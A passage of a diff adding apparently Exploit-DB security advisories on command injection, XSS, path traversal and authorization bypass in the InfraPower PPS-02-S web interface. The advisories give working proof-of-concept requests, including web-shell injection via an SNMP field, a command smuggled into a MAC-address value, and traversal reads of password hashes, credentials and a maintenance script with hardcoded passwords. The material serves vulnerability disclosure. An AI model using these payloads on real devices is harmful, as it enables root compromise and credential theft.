+arbitrary system commands as the root user and bypass access controls in +place. + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5372 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php + + +27.09.2016 + +-- + + +doupgrate.php: +-------------- + + +09: "; +11: echo "IP=".$_POST["ipaddr"]."
"; +12: echo "Firmware Name=".$_POST["fwname"]."
"; +13: system("sh nfs.sh"); +14: echo "Mounting NFS
"; +15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs"); +16: system("cp /nfs/".$_POST["fwname"]." /"); +17: echo "Flash erasing
"; +18: system("@flash_eraseall /dev/mtd0"); +19: system("cp /".$_POST["fwname"]." /dev/mtd0"); +20: echo "Upgrate done
"; +21: system("umount /nfs"); +22: echo "Reboot system
"; +23: system("reboot"); +24: ?> + +--------------------------------------------------------------------- + + +IPSettings.php: +--------------- + + +83: $IP_setting = ereg_ip($_POST['IP']); +84: $Netmask_setting = ereg_ip($_POST['Netmask']); +85: $Gateway_setting = ereg_ip($_POST['Gateway']); +... +... +110: $fout = fopen("/mnt/mtd/net_conf", "w"); +111: if($fout){ +112: $output = substr($output, 0, -1); +113: fprintf($fout, "%s", $output); +114: //echo $change_ip.'b'; +115: if($change_ip === '1'){ +116: $str = ''; +117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str); +118: // echo $str."\n"; +119: } +120: if($change_gw === '1'){ +121: $str = ''; +122: exec('ip route del default', $str); +123: exec('route add default gw '.$Gateway_setting, $str); +124: // echo $str[0]."a\n"; +125: } +126: } +127: fclose($fout); +... +... +164: function ereg_ip($ipstring){ +165: $ipstring=trim($ipstring); //移除前後空白 +166: //格式錯誤 +167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0; +168: //內容檢查 +169: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。 +170: foreach($ip_segment as $k =>$v){ +171: if($v >255){ +171: return 0; +172: } +173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4 +174: } //end foreach +175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理 +176: return $ipstring; +177: } + +--------------------------------------------------------------------- + + +Login.php: +---------- + + +126: $UserName = getConf("/mnt/mtd/web_conf", "UserName"); +127: $Password = getConf("/mnt/mtd/web_conf", "Password"); +128: +129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password; +130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){ +... +... 
+140: $_SESSION['Login'] = $_POST['ID_User']; +141: +142: //Login +143: $loginTime = date("Y-m-d,H:i:s.0,P"); +144: $remoteIP = $_SERVER['REMOTE_ADDR']; +145: //----------SNMP checking ---Ed 20130307------------------------< +146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable"); +147: if ($SNMPEnable == "1") { +148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap"); +149: if ($TrapEnable == "v2Trap") { +150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP"); +151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"'); +152: //echo "alert($res);"; +153: } +154: } + +--------------------------------------------------------------------- + + +Ntp.php: +-------- + + +36: + +--------------------------------------------------------------------- + + +production_test1.php: +--------------------- + + +4: if( isset($_POST['macAddress']) ) +5: { +6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr"); +7: $mac = shell_exec("cat /mnt/mtd/mac_addr"); +8: /*$result = $fail; +9: echo $mac . ","; +10: echo $_POST['macAddress']; +11: if( !strcmp($mac,$_POST['macAddress']) ) +12: $result = $success; +13: echo "verify - " . $mac . " - " . $result;*/ +14: echo "verify - " . 
$mac; +15: +16: exit(); +17: } + +--------------------------------------------------------------------- + + +SNMP.php: +--------- + + +34: if($_POST["SNMPAgent"] === "Enable"){ +35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`'); +36: setConf("/mnt/mtd/snmp_conf", "enable", "1"); +37: +38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"])) +39: { +40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf"); +41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf"); +42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]); +43: setSnmpConf(1,$_POST["CommuintyString"]); +44: setSnmpConf(2,$_POST["CommuintyWrite"]); +45: $pCommunity = $_POST["CommuintyString"]; +46: } + +--------------------------------------------------------------------- + + +System.php: +----------- + + +86: if(!empty($_POST['ChangeTime']) == "1"){ +87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){ +88: +89: //Ray modify +90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year'])); +91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second']; +92: +93: +94: if(isset($_POST['TimeZone'])){ +95: setTimeZone($_POST['TimeZone']); +96: $orgZone = $_POST['TimeZone']; +97: } +98: +99: exec('date '.$datetime); +100: exec('hwclock -w'); +101: exec('hwclock -w -f /dev/rtc1'); +... +... +180: if(isset($_POST['TimeServer'])){ +181: //$TimeServer = ereg_ip($_POST['TimeServer']); +182: if(!empty($_POST['TimeServer'])){ +183: $TimeServer = $_POST['TimeServer']; +184: +185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1"); +... +... +286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str); +... +... +292: exec('route add default gw '.$Gateway_setting, $str); +... +... 
+336: function ereg_ip($ipstring){ +337: $ipstring=trim($ipstring); //移除前後空白 +338: //格式錯誤 +339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0; +340: //內容檢查 +341: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。 +342: foreach($ip_segment as $k =>$v){ +343: if($v >255){ +344: return 0; +345: } +346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4 +347: } //end foreach +348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理 +349: return $ipstring; +350: } + +--------------------------------------------------------------------- + + +UploadEXE.php: +-------------- + + +72: if(isset($_POST['hasFile'])){ +73: if ($_FILES['ExeFile']['error'] > 0){ +74: echo 'Error: ' . $_FILES['FW']['error']; +75: }else{ +76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'
'; +... +... +80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']); +81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777"); +82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r"); + +--------------------------------------------------------------------- +--------------------------------------------------------------------- +--------------------------------------------------------------------- + + +#1 +-- + +PoC Request: + +curl -i -s -k -X 'POST' \ + -H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \ + --data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \ + 'https://192.168.0.17/SNMP.php?Menu=SMP' + +... + +curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a + +Response: + +root + at +Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown + + +#2 +-- + +PoC Request: + +POST /production_test1.php HTTP/1.1 +Host: 192.168.0.17 +User-Agent: ZSL-Injectinator/3.1 (Unix) +Content-Type: application/x-www-form-urlencoded +Connection: close + +macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd + + +Response: + +HTTP/1.1 200 OK +X-Powered-By: PHP/5.3.9 +Content-type: text/html +Connection: close +Date: Fri, 17 Jan 2003 16:58:52 GMT +Server: lighttpd/1.4.30-devel-1321 +Content-Length: 751 + +verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh +bin:x:1:1:bin:/bin:/bin/sh +daemon:x:2:2:daemon:/usr/sbin:/bin/sh +adm:x:3:4:adm:/adm:/bin/sh +lp:x:4:7:lp:/var/spool/lpd:/bin/sh +sync:x:5:0:sync:/bin:/bin/sync +shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh +operator:x:11:0:Operator:/var:/bin/sh +nobody:x:99:99:nobody:/home:/bin/sh 
+admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script +user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script +service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh +www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh +www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh diff --git a/platforms/php/webapps/40641.txt b/platforms/php/webapps/40641.txt new file mode 100755 index 000000000..ea56b173d --- /dev/null +++ b/platforms/php/webapps/40641.txt 
@@ -0,0 +1,235 @@ +InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities +when input passed via several parameters to several scripts is not properly +sanitized before being returned to the user. This can be exploited to execute +arbitrary HTML and script code in a user's browser session in context of an affected +site. 
+ +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5369 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php + + +27.09.2016 + +-- + + +################################################################################# + +GET /SensorDetails.php?Menu=SST&DeviceID=C100"> HTTP/1.1 + +################################################################################# + +POST /FWUpgrade.php HTTP/1.1 +Host: 192.168.0.17 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh +Connection: close + +------WebKitFormBoundary207OhXVwesC60pdh +Content-Disposition: form-data; name="FW"; filename="somefile.php" +Content-Type: text/php + +t00t +------WebKitFormBoundary207OhXVwesC60pdh +Content-Disposition: form-data; name="upfile" + +somefile.php +------WebKitFormBoundary207OhXVwesC60pdh +Content-Disposition: form-data; name="ID_Page" + +Firmware.php?Menu=FRM +------WebKitFormBoundary207OhXVwesC60pdh-- + + +################################################################################# + +POST /SNMP.php?Menu=SMP HTTP/1.1 +Host: 192.168.0.17 + +SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)// + +################################################################################# + + +lqwrm@zslab:~# +lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt +------------------------------------------------- +PHP Source Code Security Scanner v0.2 +(c) Zero Science Lab - http://www.zeroscience.mk +Tue Sep 27 10:35:52 CEST 2016 +------------------------------------------------- + +Scanning recursively...Done. 
+ +dball.php: + +Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' +Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' + + +doupgrate.php: + +Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST' +Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST' +Line 15: Command Injection in 'system' via '$_POST' +Line 16: Command Injection in 'system' via '$_POST' +Line 19: Command Injection in 'system' via '$_POST' + + +Firmware.php: + +Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER' + + +Function.php: + +Line 257: Header Injection in 'header' via '$_SERVER' +Line 267: Header Injection in 'header' via '$_SERVER' + + +FWUpgrade.php: + +Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' + + +index.php: + +Line 2: Header Injection in 'header' via '$_SERVER' + + +IPSettings.php: + +Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged. +Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged. 
+Line 117: Command Injection in 'exec' via '$IP_setting' +Line 117: Command Injection in 'exec' via '$Netmask_setting' +Line 123: Command Injection in 'exec' via '$Gateway_setting' + + +ListFile.php: + +Line 12: PHP File Inclusion in 'fgets' via '$fp' + + +Login.php: + +Line 151: Command Injection in 'shell_exec' via '$_POST' + + +Ntp.php: + +Line 46: Command Injection in 'exec' via '$idx' + + +OutletDetails.php: + +Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row' +Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row' +Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' + + +PDUStatus.php: + +Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER' + + +production_test1.php: + +Line 6: Command Injection in 'shell_exec' via '$_POST' +Line 45: Command Injection in 'proc_open' via '$_ENV' + + +SensorDetails.php: + +Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' + + +SensorStatus.php: + +Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER' + + +SNMP.php: + +Line 41: Command Injection in 'exec' via '$_POST' + + +System.php: + +Line 54: Header Injection in 'header' via '$_SERVER' +Line 64: Header Injection in 'header' via '$_SERVER' +Line 99: Command Injection in 'exec' via '$datetime' +Line 99: Command Injection in 'exec' via '$datetime' +Line 99: Command Injection in 'exec' via '$datetime' +Line 99: Command Injection in 'exec' via '$datetime' +Line 99: Command Injection in 'exec' via '$datetime' +Line 99: Command Injection in 'exec' via '$datetime' +Line 185: Command Injection in 'exec' via '$TimeServer' +Line 286: Command Injection in 
'exec' via '$IP_setting' +Line 286: Command Injection in 'exec' via '$Netmask_setting' +Line 292: Command Injection in 'exec' via '$Gateway_setting' + + +UploadEXE.php: + +Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 82: Command Injection in 'popen' via '$_FILES' +Line 96: PHP File Inclusion in 'fgets' via '$fp' +Line 96: PHP File Inclusion in 'fgets' via '$buffer' + + +WriteRequest.php: + +Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST' +Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page' +Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page' + + +----------------------------------------------------- +Scan finished. Check results in scan_output.txt file. + +lqwrm@zslab:~# diff --git a/platforms/php/webapps/40642.txt b/platforms/php/webapps/40642.txt new file mode 100755 index 000000000..ae55b5516 --- /dev/null +++ b/platforms/php/webapps/40642.txt 
@@ -0,0 +1,389 @@ +InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: InfraPower suffers from a file disclosure vulnerability when +input passed thru the 'file' parameter to 'ListFile.php' script is +not properly verified before being used to read files. This can +be exploited to disclose contents of files from local resources. + +------------------------------------------------------------------- +ListFile.php: +------------- + +8: if(isset($_GET['file'])){ +9: $handle = $_GET['file']; +10: $fp = fopen('/ramdisk/'.$handle, 'r'); +11: while(!feof($fp)){ +12: $tmp=fgets($fp,2000); +13: $tmp = str_replace("\n","
",$tmp); +14: echo $tmp; +15: } +16: fclose($fp); +17: } + +------------------------------------------------------------------- + + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5370 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php + + +27.09.2016 + +-- + + +http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd + +root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh +bin:x:1:1:bin:/bin:/bin/sh +daemon:x:2:2:daemon:/usr/sbin:/bin/sh +adm:x:3:4:adm:/adm:/bin/sh +lp:x:4:7:lp:/var/spool/lpd:/bin/sh +sync:x:5:0:sync:/bin:/bin/sync +shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh +operator:x:11:0:Operator:/var:/bin/sh +nobody:x:99:99:nobody:/home:/bin/sh +admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script +user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script +service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh +www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh +www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh + + +http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf + +LoginAuth 1 +UserName 00000000 +Password 00000000 + + +http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf + +dmin 999999 +manager 666666 +user 111111 + + +http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh + +#!/bin/sh +echo -n "Please enter maintenance password:" +read -s pass +InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2` +if [ "$InfraType" == "1" ]; then +if [ "$pass" != "InfraSolution" ]; then +echo "Invalid maintenance password!" 
+exit 0 +fi +else +if [ "$InfraType" == "2" ]; then +if [ "$pass" != "InfraGuard" ]; then +echo "Invalid maintenance password!" +exit 0 +fi +else +if [ "$InfraType" == "3" ]; then +if [ "$pass" != "InfraPower" ]; then +echo "Invalid maintenance password!" +exit 0 +fi +else +if [ "$InfraType" == "4" ]; then +if [ "$pass" != "InfraCool" ]; then +echo "Invalid maintenance password!" +exit 0 +fi +else +#---emergency recovery mode +echo "DEBUG su mode started!" +su +fi +fi +fi +fi + +# create menu +echo "" +echo "***********************************************" +echo "* Maintenance Menu *" +echo "***********************************************" +echo "(1) View(vi) /mnt/mtd/main_conf " +echo "(2) View /mnt/mtd/snmp_conf " +echo "(3) View /mnt/mtd/net_conf " +echo "(4) View /mnt/mtd/web_conf " +echo "(5) Enable auto patching(boot.sh) on bootup " +echo "(6) Disable auto patching(boot.sh) on bootup " +echo "(7) Clear all patching (/mnt/mtd/patch/) " +echo "(8) Update /www/patch/ to /mnt/mtd/patch/ " +echo "(9) Process Monitoring " +echo "(A) Patch SNMP " +echo "(B) Restore Configuration " +echo "(P) Restore INI, POL profiles " +echo "(E) Execute command line " +echo "(M) View meminfo " +echo "(X) Terminal console mode " +echo "(R) Reboot " +echo "(?) This menu " +echo "(Q) Exit " +echo "***********************************************" +while true; do +echo -n "Input Maintenance menu item number(? 
for help):" +read y +case $y in +"?") +echo "" +echo "***********************************************" +echo "* Maintenance Menu *" +echo "***********************************************" +echo "(1) View(vi) /mnt/mtd/main_conf " +echo "(2) View /mnt/mtd/snmp_conf " +echo "(3) View /mnt/mtd/net_conf " +echo "(4) View /mnt/mtd/web_conf " +echo "(5) Enable auto patching(boot.sh) on bootup " +echo "(6) Disable auto patching(boot.sh) on bootup " +echo "(7) Clear all patching (/mnt/mtd/patch/) " +echo "(8) Update /www/patch/ to /mnt/mtd/patch/ " +echo "(9) Process Monitoring " +echo "(A) Patch SNMP " +echo "(B) Restore Configuration " +echo "(P) Restore INI, POL profiles " +echo "(E) Execute command line " +echo "(M) View meminfo " +echo "(X) Terminal console mode " +echo "(R) Reboot " +echo "(?) This menu " +echo "(Q) Exit " +echo "***********************************************" +;; +"1") +echo "****/mnt/mtd/main_conf******************************" +vi /mnt/mtd/main_conf +echo "****************************************************" +;; +"2") +echo "****/mnt/mtd/snmp_conf******************************" +cat /mnt/mtd/snmp_conf +echo "****************************************************" +;; +"3") +echo "****/mnt/mtd/net_conf*******************************" +cat /mnt/mtd/net_conf +echo "****************************************************" +;; +"4") +echo "****/mnt/mtd/web_conf*******************************" +cat /mnt/mtd/web_conf +echo "****************************************************" +;; +"5") +echo "(5) Enable auto patching(boot.sh) on bootup " +echo -n "Are you sure to continue? [y/n]:" +read ans5 +if [ "$ans5" == "y" ]; then +if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then +echo -n "Patching boot.sh ..." 
+cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh +chmod 777 /mnt/mtd/boot.sh +if [ -f "/mnt/mtd/boot.sh" ]; then +echo "...done" +else +echo "...fail" +fi +else +echo "file not exist: /mnt/mtd/patch/boot.sh" +fi +fi +;; +"6") +echo "(6) Disable auto patching(boot.sh) on bootup " +echo -n "Are you sure to continue? [y/n]:" +read ans6 +if [ "$ans6" == "y" ]; then +if [ -f "/mnt/mtd/boot.sh" ]; then +echo -n "Disabling boot.sh pacthing..." +rm /mnt/mtd/boot.sh +echo "...done" +else +echo "File not exist: /mnt/mtd/boot.sh" +fi +fi +;; +"7") +echo "(7) Clear /mnt/mtd/patch/ " +echo -n "Are you sure to continue? [y/n]:" +read ans7 +if [ "$ans7" == "y" ]; then +echo -n " Removing patch files (/mnt/mtd/patch/*)..." +rm -r /mnt/mtd/patch/* +if [ ! -f "/mnt/mtd/patch/" ]; then +echo "...done" +echo -n "Reboot to apply changes? [y/n]:" +read ans7r +if [ "$ans7r" == "y" ]; then +echo "Rebooting..." +reboot +fi + +else +echo "...fail" +fi +fi +;; +"8") +echo "(8) Update /www/patch/ to /mnt/mtd/patch/ " +echo -n "Are you sure to continue? [y/n]:" +read ans8 +if [ "$ans8" == "y" ]; then +if [ -f "/www/patch/patch_now.sh" ]; then +chmod 777 /www/patch/patch_now.sh +sh /www/patch/patch_now.sh +else +echo "file not exist: /www/patch/patch_now.sh" +fi +fi +;; +"9") +echo "****Process List*******************************" +ps +echo "***********************************************" +;; +"A") +echo "(A) Patch SNMP " +echo -n "Are you sure to continue? [y/n]:" +read ans8 +if [ "$ans8" == "y" ]; then +if [ -f "/www/patch/snmplink.sh" ]; then +sh /www/patch/snmplink.sh +if [ -f "/www/snmplink.log" ]; then +cat /www/snmplink.log +fi +echo "Patching SNMP and its modules...done" +else +echo "file not exist: /www/patch/snmplink.sh" +fi +fi +;; +"B") +echo "(B) Restore Box Configuration(box_conf) " +echo -n "Are you sure to continue? [y/n]:" +read ans8 +if [ "$ans8" == "y" ]; then +if [ -f "/etc/box_conf" ]; then +echo "Patching /mnt/mtd/box_conf..." 
+cp /etc/box_conf /mnt/mtd/box_conf +if [ -f "/mnt/mtd/box_conf" ]; then +echo "Patching /mnt/mtd/box_conf...done" +else +echo "Patching /mnt/mtd/box_conf...failed" +fi +else +echo "file not exist: /etc/box_conf" +fi +fi +;; +"P") +INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1` +echo "(P) Restore INI, POL profiles for $INFRA_VER " +echo -n "Are you sure to continue? [y/n]:" +read ansP +if [ "$ansP" == "y" ]; then +if [ "$InfraType" == "1" ]; then +echo "Restoring INI, POL profiles for $INFRA_VER..." +if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then +echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..." +cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini +echo "...done" +fi +if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then +echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..." +cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol +echo "...done" +fi +if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then +echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..." +cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini +echo "...done" +fi +if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then +echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..." +cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol +echo "...done" +fi +if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then +echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..." +cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini +echo "...done" +fi +if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then +echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..." +cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol +echo "...done" +fi +if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then +echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..." +cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini +echo "...done" +fi +if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then +echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..." 
+cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol +echo "...done" +fi +fi +fi +;; +"E") +echo -n "Input command line:" +read cmd_line +$cmd_line +;; +"M") +if [ -f "/mnt/mtd/log_memCheck.txt" ]; then +cat /mnt/mtd/log_memCheck.txt +fi +;; +"R") +echo "(R) Reboot " +echo -n "Are you sure to continue? [y/n]:" +read ansR +if [ "$ansR" == "y" ]; then +echo "Rebooting..." +reboot +fi +;; +"X") +echo "su mode started!" +su +;; +"Q") +echo "Leaving maintenance mode........OK" +exit 0 +;; +esac +done diff --git a/platforms/php/webapps/40644.txt b/platforms/php/webapps/40644.txt new file mode 100755 index 000000000..c200cf1f2 --- /dev/null +++ b/platforms/php/webapps/40644.txt 
@@ -0,0 +1,54 @@
+InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
